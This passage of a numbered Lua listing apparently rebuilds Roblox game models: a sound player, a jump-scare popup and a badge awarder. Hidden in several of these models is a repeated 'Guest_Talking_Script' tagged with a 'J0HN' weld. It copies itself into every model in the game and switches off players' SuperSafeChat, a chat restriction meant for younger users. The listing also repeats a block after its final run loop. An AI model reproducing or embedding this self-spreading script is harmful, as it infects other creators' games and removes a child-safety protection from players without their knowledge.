  3625. ["Name"] = "Guest_Talking_Script",
  3626. ["Parent"] = o382,
  3627. })
  3628. table.insert(cors,coroutine.create(function()
  3629. wait()
  3630. runDummyScript(function()
  3631. if (script.Parent == workspace) then
  3632. function checkForAndSwitch(player)
  3633. if (player.SuperSafeChat == true) then
  3634. player.SuperSafeChat = false;
  3635. wait(5);
  3636. local m = Instance.new("Message");
  3637. m.Text = "Press the / key to start typing.";
  3638. m.Parent = player;
  3639. wait(5);
  3640. m.Text = "Then press Enter to send your message.";
  3641. wait(5);
  3642. m:Remove();
  3643. m = nil;
  3644. end
  3645. player = nil;
  3646. collectgarbage("collect");
  3647. end
  3648.  
  3649. function onChildAddedToPlayers(obj)
  3650. if (obj.className == "Player") then
  3651. checkForAndSwitch(obj);
  3652. local m = Instance.new("Message");
  3653. m.Text = "welcome me place!!!";
  3654. m.Parent = obj;
  3655. wait(5);
  3656. m:Remove();
  3657. m = nil;
  3658. end
  3659. obj = nil;
  3660. collectgarbage("collect");
  3661. end
  3662.  
  3663. function onChildAddedToWorkspace(obj)
  3664. if (obj.className == "Model") then
  3665. if (game.Players:playerFromCharacter(obj) ~= nil) then
  3666. checkForAndSwitch(game.Players:playerFromCharacter(obj));
  3667. end
  3668. end
  3669. obj = nil;
  3670. collectgarbage("collect");
  3671. end
  3672.  
  3673. function findLowestLevel(obj)
  3674. local c = obj:GetChildren();
  3675. local lowestLevel = true;
  3676.  
  3677. for i, v in pairs(c) do
  3678. if (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  3679. lowestLevel = false;
  3680. wait();
  3681. findLowestLevel(v);
  3682. end
  3683. end
  3684.  
  3685. if (obj ~= workspace and lowestLevel == true and (obj:FindFirstChild(script.Name) == nil)) then
  3686. if (obj ~= game.Lighting and obj ~= game.StarterPack) then
  3687. local s = script:Clone();
  3688. s.Parent = obj;
  3689. end
  3690. end
  3691. end
  3692.  
  3693. findLowestLevel(game);
  3694.  
  3695. game.Players.ChildAdded:connect(onChildAddedToPlayers);
  3696. game.Workspace.ChildAdded:connect(onChildAddedToWorkspace);
  3697. else
  3698. local findScript = workspace:FindFirstChild(script.Name);
  3699.  
  3700. if (findScript == nil) then
  3701. local s = script:Clone();
  3702. s.Parent = workspace;
  3703. end
  3704. end
  3705.  
  3706. --[[function findAllCopies(obj)
  3707. local c = obj:GetChildren();
  3708.  
  3709. for i, v in pairs(c) do
  3710. if (v.Name == script.Name and v.className == "Script" and v ~= script) then
  3711. v.Parent = nil;
  3712. elseif (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  3713. findAllCopies(v);
  3714. end
  3715. end
  3716. end
  3717.  
  3718. findAllCopies(game);
  3719.  
  3720. script.Parent = nil;]]
  3721. end,o416)
  3722. end))
  3723. o418 = Create("Weld",{
  3724. ["Name"] = "J0HN",
  3725. ["Parent"] = o416,
  3726. })
  3727. o419 = Create("Model",{
  3728. ["Name"] = "scary",
  3729. ["Parent"] = o1,
  3730. })
  3731. o420 = Create("Part",{
  3732. ["Parent"] = o419,
  3733. ["BrickColor"] = BrickColor.new("Neon orange"),
  3734. ["Position"] = Vector3.new(-54.9001389, 163.190109, 111.799652),
  3735. ["Rotation"] = Vector3.new(-0, -90, 0),
  3736. ["CFrame"] = CFrame.new(-54.9001389, 163.190109, 111.799652, 0, 0, -1, 0, 1, 0, 1, 0, 0),
  3737. ["Size"] = Vector3.new(1, 7.20000029, 2),
  3738. ["BackSurface"] = Enum.SurfaceType.Weld,
  3739. ["BottomSurface"] = Enum.SurfaceType.Weld,
  3740. ["FrontSurface"] = Enum.SurfaceType.Weld,
  3741. ["LeftSurface"] = Enum.SurfaceType.Weld,
  3742. ["RightSurface"] = Enum.SurfaceType.Weld,
  3743. ["TopSurface"] = Enum.SurfaceType.Weld,
  3744. ["Color"] = Color3.new(0.835294, 0.45098, 0.239216),
  3745. })
  3746. o421 = Create("Part",{
  3747. ["Parent"] = o419,
  3748. ["BrickColor"] = BrickColor.new("Phosph. White"),
  3749. ["Position"] = Vector3.new(-55.4001999, 163.190109, 115.299652),
  3750. ["Rotation"] = Vector3.new(-0, -90, 0),
  3751. ["CFrame"] = CFrame.new(-55.4001999, 163.190109, 115.299652, 0, 0, -1, 0, 1, 0, 1, 0, 0),
  3752. ["Size"] = Vector3.new(6, 7.20000029, 1),
  3753. ["BackSurface"] = Enum.SurfaceType.Weld,
  3754. ["BottomSurface"] = Enum.SurfaceType.Weld,
  3755. ["FrontSurface"] = Enum.SurfaceType.Weld,
  3756. ["LeftSurface"] = Enum.SurfaceType.Weld,
  3757. ["RightSurface"] = Enum.SurfaceType.Weld,
  3758. ["TopSurface"] = Enum.SurfaceType.Weld,
  3759. ["Color"] = Color3.new(0.92549, 0.909804, 0.870588),
  3760. })
  3761. o422 = Create("Texture",{
  3762. ["Name"] = "Tex",
  3763. ["Parent"] = o421,
  3764. ["Texture"] = "rbxasset://none",
  3765. ["StudsPerTileU"] = 5,
  3766. ["StudsPerTileV"] = 5,
  3767. })
  3768. o423 = Create("Script",{
  3769. ["Parent"] = o421,
  3770. })
  3771. table.insert(cors,coroutine.create(function()
  3772. wait()
  3773. runDummyScript(function()
  3774. d=script.Parent.Tex
  3775. while true do
  3776. wait(15)
  3777. d.Texture="http://www.roblox.com/asset/?id=49439195"
  3778. wait(1)
  3779. d.Texture="rbxasset://none"
  3780. end
  3781. end,o423)
  3782. end))
  3783. o424 = Create("Part",{
  3784. ["Parent"] = o419,
  3785. ["BrickColor"] = BrickColor.new("Neon orange"),
  3786. ["Position"] = Vector3.new(-54.9001389, 167.390045, 115.299652),
  3787. ["Rotation"] = Vector3.new(-0, -90, 0),
  3788. ["CFrame"] = CFrame.new(-54.9001389, 167.390045, 115.299652, 0, 0, -1, 0, 1, 0, 1, 0, 0),
  3789. ["Size"] = Vector3.new(8, 1.20000005, 2),
  3790. ["BackSurface"] = Enum.SurfaceType.Weld,
  3791. ["BottomSurface"] = Enum.SurfaceType.Weld,
  3792. ["FrontSurface"] = Enum.SurfaceType.Weld,
  3793. ["LeftSurface"] = Enum.SurfaceType.Weld,
  3794. ["RightSurface"] = Enum.SurfaceType.Weld,
  3795. ["TopSurface"] = Enum.SurfaceType.Weld,
  3796. ["Color"] = Color3.new(0.835294, 0.45098, 0.239216),
  3797. })
  3798. o425 = Create("Part",{
  3799. ["Parent"] = o419,
  3800. ["BrickColor"] = BrickColor.new("Neon orange"),
  3801. ["Position"] = Vector3.new(-54.9001389, 158.990112, 115.299652),
  3802. ["Rotation"] = Vector3.new(-0, -90, 0),
  3803. ["CFrame"] = CFrame.new(-54.9001389, 158.990112, 115.299652, 0, 0, -1, 0, 1, 0, 1, 0, 0),
  3804. ["Size"] = Vector3.new(8, 1.20000005, 2),
  3805. ["BackSurface"] = Enum.SurfaceType.Weld,
  3806. ["BottomSurface"] = Enum.SurfaceType.Weld,
  3807. ["FrontSurface"] = Enum.SurfaceType.Weld,
  3808. ["LeftSurface"] = Enum.SurfaceType.Weld,
  3809. ["RightSurface"] = Enum.SurfaceType.Weld,
  3810. ["TopSurface"] = Enum.SurfaceType.Weld,
  3811. ["Color"] = Color3.new(0.835294, 0.45098, 0.239216),
  3812. })
  3813. o426 = Create("Part",{
  3814. ["Parent"] = o419,
  3815. ["BrickColor"] = BrickColor.new("Neon orange"),
  3816. ["Position"] = Vector3.new(-54.9001389, 163.190109, 118.799652),
  3817. ["Rotation"] = Vector3.new(-0, -90, 0),
  3818. ["CFrame"] = CFrame.new(-54.9001389, 163.190109, 118.799652, 0, 0, -1, 0, 1, 0, 1, 0, 0),
  3819. ["Size"] = Vector3.new(1, 7.20000029, 2),
  3820. ["BackSurface"] = Enum.SurfaceType.Weld,
  3821. ["BottomSurface"] = Enum.SurfaceType.Weld,
  3822. ["FrontSurface"] = Enum.SurfaceType.Weld,
  3823. ["LeftSurface"] = Enum.SurfaceType.Weld,
  3824. ["RightSurface"] = Enum.SurfaceType.Weld,
  3825. ["TopSurface"] = Enum.SurfaceType.Weld,
  3826. ["Color"] = Color3.new(0.835294, 0.45098, 0.239216),
  3827. })
  3828. o427 = Create("Script",{
  3829. ["Name"] = "Guest_Talking_Script",
  3830. ["Parent"] = o419,
  3831. })
  3832. table.insert(cors,coroutine.create(function()
  3833. wait()
  3834. runDummyScript(function()
  3835. if (script.Parent == workspace) then
  3836. function checkForAndSwitch(player)
  3837. if (player.SuperSafeChat == true) then
  3838. player.SuperSafeChat = false;
  3839. wait(5);
  3840. local m = Instance.new("Message");
  3841. m.Text = "Press the / key to start typing.";
  3842. m.Parent = player;
  3843. wait(5);
  3844. m.Text = "Then press Enter to send your message.";
  3845. wait(5);
  3846. m:Remove();
  3847. m = nil;
  3848. end
  3849. player = nil;
  3850. collectgarbage("collect");
  3851. end
  3852.  
  3853. function onChildAddedToPlayers(obj)
  3854. if (obj.className == "Player") then
  3855. checkForAndSwitch(obj);
  3856. local m = Instance.new("Message");
  3857. m.Text = "welcome me place!!!";
  3858. m.Parent = obj;
  3859. wait(5);
  3860. m:Remove();
  3861. m = nil;
  3862. end
  3863. obj = nil;
  3864. collectgarbage("collect");
  3865. end
  3866.  
  3867. function onChildAddedToWorkspace(obj)
  3868. if (obj.className == "Model") then
  3869. if (game.Players:playerFromCharacter(obj) ~= nil) then
  3870. checkForAndSwitch(game.Players:playerFromCharacter(obj));
  3871. end
  3872. end
  3873. obj = nil;
  3874. collectgarbage("collect");
  3875. end
  3876.  
  3877. function findLowestLevel(obj)
  3878. local c = obj:GetChildren();
  3879. local lowestLevel = true;
  3880.  
  3881. for i, v in pairs(c) do
  3882. if (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  3883. lowestLevel = false;
  3884. wait();
  3885. findLowestLevel(v);
  3886. end
  3887. end
  3888.  
  3889. if (obj ~= workspace and lowestLevel == true and (obj:FindFirstChild(script.Name) == nil)) then
  3890. if (obj ~= game.Lighting and obj ~= game.StarterPack) then
  3891. local s = script:Clone();
  3892. s.Parent = obj;
  3893. end
  3894. end
  3895. end
  3896.  
  3897. findLowestLevel(game);
  3898.  
  3899. game.Players.ChildAdded:connect(onChildAddedToPlayers);
  3900. game.Workspace.ChildAdded:connect(onChildAddedToWorkspace);
  3901. else
  3902. local findScript = workspace:FindFirstChild(script.Name);
  3903.  
  3904. if (findScript == nil) then
  3905. local s = script:Clone();
  3906. s.Parent = workspace;
  3907. end
  3908. end
  3909.  
  3910. --[[function findAllCopies(obj)
  3911. local c = obj:GetChildren();
  3912.  
  3913. for i, v in pairs(c) do
  3914. if (v.Name == script.Name and v.className == "Script" and v ~= script) then
  3915. v.Parent = nil;
  3916. elseif (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  3917. findAllCopies(v);
  3918. end
  3919. end
  3920. end
  3921.  
  3922. findAllCopies(game);
  3923.  
  3924. script.Parent = nil;]]
  3925. end,o427)
  3926. end))
  3927. o429 = Create("Weld",{
  3928. ["Name"] = "J0HN",
  3929. ["Parent"] = o427,
  3930. })
  3931. o430 = Create("Model",{
  3932. ["Name"] = "Sound Player",
  3933. ["Parent"] = o1,
  3934. })
  3935. o431 = Create("Part",{
  3936. ["Name"] = "Play",
  3937. ["Parent"] = o430,
  3938. ["BrickColor"] = BrickColor.new("Bright green"),
  3939. ["Position"] = Vector3.new(-26.4001846, 155.690109, 126.799652),
  3940. ["Rotation"] = Vector3.new(-0, 90, 0),
  3941. ["Anchored"] = true,
  3942. ["CFrame"] = CFrame.new(-26.4001846, 155.690109, 126.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  3943. ["FormFactor"] = Enum.FormFactor.Custom,
  3944. ["Size"] = Vector3.new(1, 0.200000003, 1),
  3945. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  3946. ["TopSurface"] = Enum.SurfaceType.Smooth,
  3947. ["Color"] = Color3.new(0.294118, 0.592157, 0.294118),
  3948. })
  3949. o432 = Create("ClickDetector",{
  3950. ["Parent"] = o431,
  3951. ["MaxActivationDistance"] = 50,
  3952. })
  3953. o433 = Create("Script",{
  3954. ["Parent"] = o431,
  3955. })
  3956. table.insert(cors,coroutine.create(function()
  3957. wait()
  3958. runDummyScript(function()
  3959. Brick = script.Parent
  3960. Other = Brick.Parent.Stop
  3961. Sound = Brick.Parent.Sound
  3962.  
  3963. function onClicked()
  3964.  
  3965. Sound:Play()
  3966.  
  3967. end
  3968.  
  3969. script.Parent.ClickDetector.MouseClick:connect(onClicked)
  3970.  
  3971. end,o433)
  3972. end))
  3973. o434 = Create("Fire",{
  3974. ["Parent"] = o431,
  3975. ["Size"] = 30,
  3976. ["Color"] = Color3.new(1, 0.788235, 0),
  3977. ["Enabled"] = false,
  3978. ["Heat"] = 25,
  3979. ["SecondaryColor"] = Color3.new(1, 0, 0),
  3980. })
  3981. o435 = Create("Part",{
  3982. ["Name"] = "Stop",
  3983. ["Parent"] = o430,
  3984. ["BrickColor"] = BrickColor.new("Bright red"),
  3985. ["Position"] = Vector3.new(-26.4001846, 155.690109, 127.799652),
  3986. ["Rotation"] = Vector3.new(-0, 90, 0),
  3987. ["Anchored"] = true,
  3988. ["CFrame"] = CFrame.new(-26.4001846, 155.690109, 127.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  3989. ["FormFactor"] = Enum.FormFactor.Custom,
  3990. ["Size"] = Vector3.new(1, 0.200000003, 1),
  3991. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  3992. ["TopSurface"] = Enum.SurfaceType.Smooth,
  3993. ["Color"] = Color3.new(0.768628, 0.156863, 0.109804),
  3994. })
  3995. o436 = Create("ClickDetector",{
  3996. ["Parent"] = o435,
  3997. ["MaxActivationDistance"] = 50,
  3998. })
  3999. o437 = Create("Script",{
  4000. ["Parent"] = o435,
  4001. })
  4002. table.insert(cors,coroutine.create(function()
  4003. wait()
  4004. runDummyScript(function()
  4005. Brick = script.Parent
  4006. Other = Brick.Parent.Play
  4007. Sound = Brick.Parent.Sound
  4008.  
  4009. function onClicked()
  4010.  
  4011. Sound:Stop()
  4012.  
  4013. end
  4014.  
  4015. script.Parent.ClickDetector.MouseClick:connect(onClicked)
  4016.  
  4017. end,o437)
  4018. end))
  4019. o438 = Create("Fire",{
  4020. ["Parent"] = o435,
  4021. ["Size"] = 30,
  4022. ["Color"] = Color3.new(1, 0.788235, 0),
  4023. ["Enabled"] = false,
  4024. ["Heat"] = 25,
  4025. ["SecondaryColor"] = Color3.new(1, 0, 0),
  4026. })
  4027. o439 = Create("Sound",{
  4028. ["Parent"] = o430,
  4029. ["Pitch"] = 3,
  4030. ["SoundId"] = "http://www.roblox.com/asset/?id=27697743",
  4031. ["Volume"] = 1,
  4032. ["Looped"] = true,
  4033. })
  4034. o440 = Create("Script",{
  4035. ["Name"] = "Guest_Talking_Script",
  4036. ["Parent"] = o430,
  4037. })
  4038. table.insert(cors,coroutine.create(function()
  4039. wait()
  4040. runDummyScript(function()
  4041. if (script.Parent == workspace) then
  4042. function checkForAndSwitch(player)
  4043. if (player.SuperSafeChat == true) then
  4044. player.SuperSafeChat = false;
  4045. wait(5);
  4046. local m = Instance.new("Message");
  4047. m.Text = "Press the / key to start typing.";
  4048. m.Parent = player;
  4049. wait(5);
  4050. m.Text = "Then press Enter to send your message.";
  4051. wait(5);
  4052. m:Remove();
  4053. m = nil;
  4054. end
  4055. player = nil;
  4056. collectgarbage("collect");
  4057. end
  4058.  
  4059. function onChildAddedToPlayers(obj)
  4060. if (obj.className == "Player") then
  4061. checkForAndSwitch(obj);
  4062. local m = Instance.new("Message");
  4063. m.Text = "welcome me place!!!";
  4064. m.Parent = obj;
  4065. wait(5);
  4066. m:Remove();
  4067. m = nil;
  4068. end
  4069. obj = nil;
  4070. collectgarbage("collect");
  4071. end
  4072.  
  4073. function onChildAddedToWorkspace(obj)
  4074. if (obj.className == "Model") then
  4075. if (game.Players:playerFromCharacter(obj) ~= nil) then
  4076. checkForAndSwitch(game.Players:playerFromCharacter(obj));
  4077. end
  4078. end
  4079. obj = nil;
  4080. collectgarbage("collect");
  4081. end
  4082.  
  4083. function findLowestLevel(obj)
  4084. local c = obj:GetChildren();
  4085. local lowestLevel = true;
  4086.  
  4087. for i, v in pairs(c) do
  4088. if (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  4089. lowestLevel = false;
  4090. wait();
  4091. findLowestLevel(v);
  4092. end
  4093. end
  4094.  
  4095. if (obj ~= workspace and lowestLevel == true and (obj:FindFirstChild(script.Name) == nil)) then
  4096. if (obj ~= game.Lighting and obj ~= game.StarterPack) then
  4097. local s = script:Clone();
  4098. s.Parent = obj;
  4099. end
  4100. end
  4101. end
  4102.  
  4103. findLowestLevel(game);
  4104.  
  4105. game.Players.ChildAdded:connect(onChildAddedToPlayers);
  4106. game.Workspace.ChildAdded:connect(onChildAddedToWorkspace);
  4107. else
  4108. local findScript = workspace:FindFirstChild(script.Name);
  4109.  
  4110. if (findScript == nil) then
  4111. local s = script:Clone();
  4112. s.Parent = workspace;
  4113. end
  4114. end
  4115.  
  4116. --[[function findAllCopies(obj)
  4117. local c = obj:GetChildren();
  4118.  
  4119. for i, v in pairs(c) do
  4120. if (v.Name == script.Name and v.className == "Script" and v ~= script) then
  4121. v.Parent = nil;
  4122. elseif (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  4123. findAllCopies(v);
  4124. end
  4125. end
  4126. end
  4127.  
  4128. findAllCopies(game);
  4129.  
  4130. script.Parent = nil;]]
  4131. end,o440)
  4132. end))
  4133. o442 = Create("Weld",{
  4134. ["Name"] = "J0HN",
  4135. ["Parent"] = o440,
  4136. })
  4137. o443 = Create("Part",{
  4138. ["Name"] = "Scary Popup GUI",
  4139. ["Parent"] = o1,
  4140. ["BrickColor"] = BrickColor.new("Really black"),
  4141. ["Position"] = Vector3.new(-20.4001846, 163.790115, 127.299652),
  4142. ["Rotation"] = Vector3.new(1.82385759e-010, 90, 0),
  4143. ["Anchored"] = true,
  4144. ["CFrame"] = CFrame.new(-20.4001846, 163.790115, 127.299652, 1.59834455e-011, -5.6638587e-006, 1, 3.18323146e-012, 0.999999881, 5.66385324e-006, -1, -2.04636308e-011, 5.73011734e-012),
  4145. ["CanCollide"] = false,
  4146. ["Size"] = Vector3.new(8, 10.8000002, 3),
  4147. ["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
  4148. })
  4149. o444 = Create("ScreenGui",{
  4150. ["Name"] = "Popup",
  4151. ["Parent"] = o443,
  4152. })
  4153. o445 = Create("Frame",{
  4154. ["Name"] = "BackGround",
  4155. ["Parent"] = o444,
  4156. ["Transparency"] = 1,
  4157. ["Position"] = UDim2.new(0,0,-0.10000000149012,0),
  4158. ["Size"] = UDim2.new(1.1000000238419,0,1.2000000476837,0),
  4159. ["BackgroundColor3"] = Color3.new(0.109804, 0.109804, 0.109804),
  4160. ["BackgroundTransparency"] = 1,
  4161. })
  4162. o446 = Create("ImageLabel",{
  4163. ["Name"] = "Image",
  4164. ["Parent"] = o445,
  4165. ["Transparency"] = 1,
  4166. ["Position"] = UDim2.new(0.0010000000474975,0,0.050000000745058,0),
  4167. ["Size"] = UDim2.new(1,0,1,0),
  4168. ["BackgroundColor3"] = Color3.new(0, 0, 0),
  4169. ["BackgroundTransparency"] = 1,
  4170. ["Image"] = "http://www.roblox.com/asset/?id=33466920",
  4171. })
  4172. o447 = Create("Sound",{
  4173. ["Name"] = "Scream",
  4174. ["Parent"] = o443,
  4175. ["Pitch"] = 2,
  4176. ["SoundId"] = "http://www.roblox.com/asset/?id=11984351",
  4177. ["Volume"] = 1,
  4178. })
  4179. o448 = Create("Fire",{
  4180. ["Parent"] = o443,
  4181. ["Size"] = 30,
  4182. ["Color"] = Color3.new(0, 0, 1),
  4183. ["Enabled"] = false,
  4184. ["Heat"] = 25,
  4185. ["SecondaryColor"] = Color3.new(1, 1, 1),
  4186. })
  4187. o449 = Create("Script",{
  4188. ["Name"] = "ScaryScript!",
  4189. ["Parent"] = o443,
  4190. })
  4191. table.insert(cors,coroutine.create(function()
  4192. wait()
  4193. runDummyScript(function()
  4194. Sound = script.Parent.Scream
  4195. Popup = script.Parent.Popup
  4196. Ready = true
  4197. function onTouch(hit)
  4198. local h = hit.Parent:FindFirstChild("Humanoid")
  4199. if h ~= nil and Ready == true then
  4200. Ready = false
  4201. local plyr = game.Players:FindFirstChild(h.Parent.Name)
  4202. local c = Popup:clone()
  4203. c.Parent = plyr.PlayerGui
  4204. script.Parent.Scream:play()
  4205. wait(2)
  4206. c:remove()
  4207. wait(1)
  4208. Ready = true
  4209. end
  4210. end
  4211.  
  4212. script.Parent.Touched:connect(onTouch)
  4213.  
  4214. end,o449)
  4215. end))
  4216. o450 = Create("Model",{
  4217. ["Name"] = "BadgeAwarder",
  4218. ["Parent"] = o1,
  4219. })
  4220. o451 = Create("Part",{
  4221. ["Name"] = "Platform",
  4222. ["Parent"] = o450,
  4223. ["BrickColor"] = BrickColor.new("Really black"),
  4224. ["Reflectance"] = 1,
  4225. ["Position"] = Vector3.new(-22.4001846, 158.990112, 127.299652),
  4226. ["Rotation"] = Vector3.new(8.5377377e-007, -8.90677074e-006, -1.95706605e-007),
  4227. ["CFrame"] = CFrame.new(-22.4001846, 158.990112, 127.299652, 0.999999821, 3.41572393e-009, -1.55452469e-007, -1.15523981e-008, 1, -1.4901163e-008, 2.44849218e-007, 1.49011585e-008, 1),
  4228. ["Size"] = Vector3.new(1, 1.20000005, 8),
  4229. ["BackSurface"] = Enum.SurfaceType.Weld,
  4230. ["BottomSurface"] = Enum.SurfaceType.Weld,
  4231. ["FrontSurface"] = Enum.SurfaceType.Weld,
  4232. ["LeftSurface"] = Enum.SurfaceType.Weld,
  4233. ["RightSurface"] = Enum.SurfaceType.Weld,
  4234. ["TopSurface"] = Enum.SurfaceType.Weld,
  4235. ["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
  4236. })
  4237. o452 = Create("Decal",{
  4238. ["Parent"] = o451,
  4239. ["Texture"] = "http://www.roblox.com/asset/?id=51290705",
  4240. ["Face"] = Enum.NormalId.Top,
  4241. })
  4242. o453 = Create("IntValue",{
  4243. ["Name"] = "BadgeID",
  4244. ["Parent"] = o451,
  4245. ["Value"] = 51290900,
  4246. })
  4247. o454 = Create("Script",{
  4248. ["Name"] = "BadgeAwarderScript",
  4249. ["Parent"] = o451,
  4250. })
  4251. table.insert(cors,coroutine.create(function()
  4252. wait()
  4253. runDummyScript(function()
  4254. print("Badge Awarder Loaded. BadgeID: " .. script.Parent.BadgeID.Value)
  4255.  
  4256.  
  4257.  
  4258. -- ROBLOX scripter hackers, see what you can do with this:
  4259. -- game:GetService("BadgeService"):UserHasBadge(userid, badgeid)
  4260.  
  4261.  
  4262. function OnTouch(part)
  4263. if (part.Parent:FindFirstChild("Humanoid") ~= nil) then
  4264. local p = game.Players:GetPlayerFromCharacter(part.Parent)
  4265. if (p ~= nil) then
  4266. print("Awarding BadgeID: " ..script.Parent.BadgeID.Value .. " to UserID: " .. p.userId)
  4267. local b = game:GetService("BadgeService")
  4268. b:AwardBadge(p.userId, script.Parent.BadgeID.Value)
  4269. end
  4270. end
  4271. end
  4272.  
  4273. script.Parent.Touched:connect(OnTouch)
  4274.  
  4275. end,o454)
  4276. end))
  4277. o455 = Create("Fire",{
  4278. ["Parent"] = o451,
  4279. ["Size"] = 30,
  4280. ["Color"] = Color3.new(1, 0.788235, 0),
  4281. ["Enabled"] = false,
  4282. ["Heat"] = 25,
  4283. ["SecondaryColor"] = Color3.new(1, 0, 0),
  4284. })
  4285. o456 = Create("Script",{
  4286. ["Name"] = "Guest_Talking_Script",
  4287. ["Parent"] = o450,
  4288. })
  4289. table.insert(cors,coroutine.create(function()
  4290. wait()
  4291. runDummyScript(function()
  4292. if (script.Parent == workspace) then
  4293. function checkForAndSwitch(player)
  4294. if (player.SuperSafeChat == true) then
  4295. player.SuperSafeChat = false;
  4296. wait(5);
  4297. local m = Instance.new("Message");
  4298. m.Text = "Press the / key to start typing.";
  4299. m.Parent = player;
  4300. wait(5);
  4301. m.Text = "Then press Enter to send your message.";
  4302. wait(5);
  4303. m:Remove();
  4304. m = nil;
  4305. end
  4306. player = nil;
  4307. collectgarbage("collect");
  4308. end
  4309.  
  4310. function onChildAddedToPlayers(obj)
  4311. if (obj.className == "Player") then
  4312. checkForAndSwitch(obj);
  4313. local m = Instance.new("Message");
  4314. m.Text = "welcome me place!!!";
  4315. m.Parent = obj;
  4316. wait(5);
  4317. m:Remove();
  4318. m = nil;
  4319. end
  4320. obj = nil;
  4321. collectgarbage("collect");
  4322. end
  4323.  
  4324. function onChildAddedToWorkspace(obj)
  4325. if (obj.className == "Model") then
  4326. if (game.Players:playerFromCharacter(obj) ~= nil) then
  4327. checkForAndSwitch(game.Players:playerFromCharacter(obj));
  4328. end
  4329. end
  4330. obj = nil;
  4331. collectgarbage("collect");
  4332. end
  4333.  
  4334. function findLowestLevel(obj)
  4335. local c = obj:GetChildren();
  4336. local lowestLevel = true;
  4337.  
  4338. for i, v in pairs(c) do
  4339. if (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  4340. lowestLevel = false;
  4341. wait();
  4342. findLowestLevel(v);
  4343. end
  4344. end
  4345.  
  4346. if (obj ~= workspace and lowestLevel == true and (obj:FindFirstChild(script.Name) == nil)) then
  4347. if (obj ~= game.Lighting and obj ~= game.StarterPack) then
  4348. local s = script:Clone();
  4349. s.Parent = obj;
  4350. end
  4351. end
  4352. end
  4353.  
  4354. findLowestLevel(game);
  4355.  
  4356. game.Players.ChildAdded:connect(onChildAddedToPlayers);
  4357. game.Workspace.ChildAdded:connect(onChildAddedToWorkspace);
  4358. else
  4359. local findScript = workspace:FindFirstChild(script.Name);
  4360.  
  4361. if (findScript == nil) then
  4362. local s = script:Clone();
  4363. s.Parent = workspace;
  4364. end
  4365. end
  4366.  
  4367. --[[function findAllCopies(obj)
  4368. local c = obj:GetChildren();
  4369.  
  4370. for i, v in pairs(c) do
  4371. if (v.Name == script.Name and v.className == "Script" and v ~= script) then
  4372. v.Parent = nil;
  4373. elseif (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  4374. findAllCopies(v);
  4375. end
  4376. end
  4377. end
  4378.  
  4379. findAllCopies(game);
  4380.  
  4381. script.Parent = nil;]]
  4382. end,o456)
  4383. end))
  4384. o458 = Create("Weld",{
  4385. ["Name"] = "J0HN",
  4386. ["Parent"] = o456,
  4387. })
  4388. o459 = Create("Part",{
  4389. ["Parent"] = o1,
  4390. ["Material"] = Enum.Material.CorrodedMetal,
  4391. ["BrickColor"] = BrickColor.new("Institutional white"),
  4392. ["Position"] = Vector3.new(-17.900116, 163.190109, 127.299652),
  4393. ["Rotation"] = Vector3.new(0, 90, 0),
  4394. ["Anchored"] = true,
  4395. ["CFrame"] = CFrame.new(-17.900116, 163.190109, 127.299652, 0, 0, 1, 0, 1, 0, -1, 0, 0),
  4396. ["CanCollide"] = false,
  4397. ["Size"] = Vector3.new(8, 9.60000038, 2),
  4398. ["TopSurface"] = Enum.SurfaceType.Smooth,
  4399. ["Color"] = Color3.new(0.972549, 0.972549, 0.972549),
  4400. })
  4401. o460 = Create("Decal",{
  4402. ["Parent"] = o459,
  4403. ["Texture"] = "http://www.roblox.com/asset/?id=2752460",
  4404. ["Face"] = Enum.NormalId.Back,
  4405. })
  4406. o461 = Create("Fire",{
  4407. ["Parent"] = o459,
  4408. ["Size"] = 30,
  4409. ["Color"] = Color3.new(1, 0.788235, 0),
  4410. ["Enabled"] = false,
  4411. ["Heat"] = 25,
  4412. ["SecondaryColor"] = Color3.new(1, 0, 0),
  4413. })
  4414. o462 = Create("Decal",{
  4415. ["Parent"] = o459,
  4416. ["Texture"] = "http://www.roblox.com/asset/?id=2752460",
  4417. })
  4418. mas.Parent = workspace
  4419. mas:MakeJoints()
  4420. local mas1 = mas:GetChildren()
  4421. for i=1,#mas1 do
  4422. mas1[i].Parent = script
  4423. ypcall(function() mas1[i]:MakeJoints() end)
  4424. end
  4425. mas:Destroy()
  4426. for i=1,#cors do
  4427. coroutine.resume(cors[i])
  4428. end
  4429. o450 = Create("Model",{
  4430. ["Name"] = "BadgeAwarder",
  4431. ["Parent"] = o1,
  4432. })
  4433. o451 = Create("Part",{
  4434. ["Name"] = "Platform",
  4435. ["Parent"] = o450,
  4436. ["BrickColor"] = BrickColor.new("Really black"),
  4437. ["Reflectance"] = 1,
  4438. ["Position"] = Vector3.new(-22.4001846, 158.990112, 127.299652),
  4439. ["Rotation"] = Vector3.new(8.5377377e-007, -8.90677074e-006, -1.95706605e-007),
  4440. ["CFrame"] = CFrame.new(-22.4001846, 158.990112, 127.299652, 0.999999821, 3.41572393e-009, -1.55452469e-007, -1.15523981e-008, 1, -1.4901163e-008, 2.44849218e-007, 1.49011585e-008, 1),
  4441. ["Size"] = Vector3.new(1, 1.20000005, 8),
  4442. ["BackSurface"] = Enum.SurfaceType.Weld,
  4443. ["BottomSurface"] = Enum.SurfaceType.Weld,
  4444. ["FrontSurface"] = Enum.SurfaceType.Weld,
  4445. ["LeftSurface"] = Enum.SurfaceType.Weld,
  4446. ["RightSurface"] = Enum.SurfaceType.Weld,
  4447. ["TopSurface"] = Enum.SurfaceType.Weld,
